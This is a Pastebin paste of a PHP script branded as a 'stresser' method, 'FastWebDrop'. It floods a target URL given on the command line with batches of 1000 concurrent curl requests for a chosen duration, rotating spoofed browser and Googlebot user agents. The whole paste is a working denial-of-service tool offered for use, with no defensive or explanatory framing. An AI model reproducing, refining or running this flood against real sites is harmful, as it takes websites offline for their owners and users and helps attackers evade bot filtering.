Advertisement
somegayone123

Untitled

Sep 20th, 2016
4,127
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.47 KB | None | 0 0
  1. <?php
  2. /*
  3. Private FastWebDrop Method by PrivateStresser.com
  4. */
  5.  
  6. set_time_limit(0);
  7. error_reporting(0);
  8. ignore_user_abort(false);
  9.  
  10.  
  11. echo "Private FastWebDrop by PrivateStresser.com
  12. ";
  13.  
  14.  
  15. if(count($argv) == 3) {
  16. $site = $argv[1];
  17. $time = $argv[2];
  18.  
  19. $useragent = array ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A",
  20. "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
  21. "Googlebot/2.1 (+http://www.googlebot.com/bot.html)",
  22. "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246",
  23. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; Avant Browser; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)",
  24. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Avant Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; .NET CLR 3.5.21022; InfoPath.2)",
  25. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Avant Browser; Avant Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; Tablet PC 2.0)",
  26. "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_7; en-us) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17 Skyfire/2.0",
  27. "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30",
  28. "Mozilla/5.0 (Linux; U; Android 2.2.1; en-ca; LG-P505R Build/FRG83) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
  29. "Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (J2ME/22.478; U; en) Presto/2.5.25 Version/10.54",
  30. "Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54",
  31. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36",
  32. "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36",
  33. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1",
  34. "Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3",
  35. "Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko",
  36. "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko",
  37. "Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16");
  38.  
  39. $endtime = time() + $time;
  40. while(time() <= $endtime) {
  41. $mc = curl_multi_init();
  42. for($thread_no = 0; $thread_no < 1000; $thread_no++) {
  43. $c[$thread_no] = curl_init();
  44. curl_setopt($c[$thread_no], CURLOPT_URL, $site);
  45. curl_setopt($c[$thread_no], CURLOPT_HEADER, 0);
  46. curl_setopt($c[$thread_no], CURLOPT_RETURNTRANSFER, 1);
  47. curl_setopt($c[$thread_no], CURLOPT_CONNECTTIMEOUT, 5);
  48. curl_setopt($c[$thread_no], CURLOPT_TIMEOUT, 10);
  49. curl_setopt($c[$thread_no], CURLOPT_USERAGENT, $useragent[rand(0,18)]);
  50. curl_multi_add_handle($mc, $c[$thread_no]);
  51. }
  52.  
  53. do {
  54. while(($execrun = curl_multi_exec($mc, $running)) == CURLM_CALL_MULTI_PERFORM);
  55. if($execrun != CURLM_OK) break;
  56.  
  57. while($done = curl_multi_info_read($mc)) {
  58. $info = curl_getinfo($done ['handle']);
  59. curl_multi_remove_handle($mc, $done['handle']);
  60. }
  61. } while($running);
  62.  
  63. curl_multi_close($mc);
  64.  
  65. echo "[+] Requests send!
  66. ";
  67. }
  68. } else {
  69. echo "
  70. Usage: php ".$argv[0]." <site> <time>
  71. ";
  72. }
  73. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement